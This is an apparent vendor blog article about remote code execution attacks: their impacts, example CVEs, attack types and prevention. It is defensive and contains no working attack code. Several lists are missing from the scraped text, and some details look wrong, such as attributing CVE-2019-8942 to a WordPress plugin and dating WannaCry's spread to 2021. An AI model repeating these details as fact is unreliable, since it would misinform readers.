E-Book: Top 50 Cybersecurity Threats
Get a complete look at the top most critical security threats of the year.
Attackers use remote code execution as a way to gain unauthorized access, perform data breaches, disrupt services and deploy malware. Here’s how you can prevent your organization from RCE attacks:
Let’s dive deep into remote code execution and, importantly, its prevention techniques.
Remote Code Execution (RCE) is a method that allows attackers to gain unauthorized access to devices and launch attacks from a remote location. With RCE, hackers can infiltrate their target's systems without needing physical access to the networks or devices.
RCE vulnerabilities fall under the category of arbitrary code execution (ACE), which encompasses a range of vulnerabilities that enable attackers to execute unauthorized code and take control of targeted systems.
Here’s how RCE attacks work:
RCE vulnerabilities can have significant impacts on organizations, ranging from financial losses to reputational damage and compromised data security. Here are some of the key impacts that organizations may experience due to RCE:
Attackers execute arbitrary code on a remote system and gain unauthorized access to the target organization's network, servers or applications. Once they get access, they ca:
RCE vulnerabilities result in data breaches where sensitive information is accessed, stolen or tampered with. Depending on the compromised data, organizations can face legal repercussions, financial penalties and loss of customer and industry trust.
Attackers also disrupt critical services or applications by executing malicious code to crash systems and cause downtime and interruptions in business operations. This impacts the organization negatively and causes severe financial losses, productivity issues and customer dissatisfaction.
When attackers gain remote code execution capabilities, they can misuse it to launch a denial-of-service attack. In this scenario, the attacker executes code that renders the system unresponsive, which results in a denial of service for legitimate users.
RCE-powered DoS attacks can disrupt online services, websites, even entire networks, causing inconvenience, financial losses or reputational damage to the affected entities.
Attackers can deploy malicious code on the compromised system to run cryptomining software without the owner's consent. They harness the system's processing power, electricity, and other resources to mine cryptocurrencies for their own benefit.
Unauthorized cryptomining consumes more power, slows down the system, and causes higher operational costs for the victim and potential damage to hardware due to excessive usage.
(Read our full cryptomining prevention guide.)
Ransomware is malware that encrypts files on a targeted system and demands a ransom for their decryption. (Ransomware families are making ransomware even more ubiquitous.)
Once attackers gain control through RCE, they initiate the ransomware attack by encrypting critical files and making them inaccessible to the victim. They then ask for a ransom payment, usually in cryptocurrencies, in exchange for providing the decryption key.
Recently, our security research team SURGe wanted to know the answer to: “How long do you have before ransomware encrypts your systems?” The answer: faster than you think. Read the blog or the full research.
Now let’s look at some CVEs that relied on remote code execution. The Common Vulnerabilities and Exposures (CVE) is a publicly available listing of frequently occurring vulnerabilities and exposures.
Also known as Log4 Shell or Log4j vulnerability, CVE-2021-44228 allows RCE attacks when the library is used with a certain configuration. An attacker can exploit this vulnerability by sending a crafted log message to a vulnerable server.
Organizations using Apache Log4j were advised to update to the latest patched version (2.15.0 or later) to mitigate this vulnerability.
(See Splunk’s response to Log4j.)
CVE-2021-1844 was discovered in the Windows Win32k component. It is an elevation of privilege vulnerability that could be exploited to execute arbitrary code in kernel mode.
Microsoft released security updates to address this vulnerability. Users should ensure their Windows systems are updated with the latest patches.
CVE-2020-17051 affects Windows Hyper-V, a virtualization feature in Microsoft Windows. It allows an authenticated attacker to execute arbitrary code on the host operating system.
Microsoft released security updates to address this vulnerability. Users should ensure their Windows systems are updated with the latest patches.
These vulnerabilities aren’t limited to operating systems. CVE-2019-8942 was found in WordPress, a popular content management system. It is an RCE vulnerability that affects the Easy WP SMTP plugin, allowing unauthenticated attackers to execute arbitrary code by injecting malicious PHP code.
(Learn more about these vulnerabilities.)
Let’s now look at the 3 types of remote code execution attacks.
Injection-based RCE attacks are attacks in which attackers inject malicious code or commands into a target system. They do this through:
By injecting malicious code, the attacker executes arbitrary commands on the target system, which helps them gain unauthorized access and control.
Deserialization is the process of converting serialized data into objects. Deserialization-based RCE attacks exploit vulnerabilities in the deserialization process of an application.
Attackers manipulate serialized data so that when it is deserialized, it executes malicious code. This type of attack can occur in applications that deserialize data from untrusted sources, allowing the attacker to execute arbitrary code on the target system.
Out-of-bounds write vulnerabilities occur when an attacker writes data beyond the boundaries of a specific memory buffer or data structure. By exploiting this vulnerability, an attacker can modify critical data, control program flow, and execute arbitrary code.
Out-of-bounds write vulnerabilities can be found in software components like network protocols, file formats or image parsers.
Here are a few techniques that you can use to mitigate the RCE attacks in your organization:
In 2017, a dangerous computer attack called WannaCry spread on its own — without needing people to click on anything. It would encrypt important files on someone's computer and then ask for money to unlock them.
Many computers that WannaCry targeted hadn't been updated properly to fix security issues. In early 2021, many companies were affected by WannaCry because the attack quickly spread to other computers on a network.
Log4J is used to keep a record of things that happen on a computer system, like errors or routine operations. It helps system administrators know what's going on. But in December 2021, Log4J affected a popular software used by many applications made with the Java programming language.
The problem with Log4J was that it had a feature that allowed people to put their own code into the log messages. This feature was misused by hackers who remotely controlled computers by sending special messages to the log.
Remote code execution (RCE) attacks are a significant threat to organizations. They involve identifying vulnerabilities in the target system, exploiting those vulnerabilities with crafted payloads, and executing the attacker's code on the target system.
To protect against RCE attacks, organizations should prioritize the prevention techniques discussed in this article.
This posting does not necessarily represent Splunk's position, strategies or opinion.
The Splunk platform removes the barriers between data and action, empowering observability, IT and security teams to ensure their organizations are secure, resilient and innovative.
Founded in 2003, Splunk is a global company — with over 7,500 employees, Splunkers have received over 1,020 patents to date and availability in 21 regions around the world — and offers an open, extensible data platform that supports shared data across any environment so that all teams in an organization can get end-to-end visibility, with context, for every interaction and business process. Build a strong data foundation with Splunk.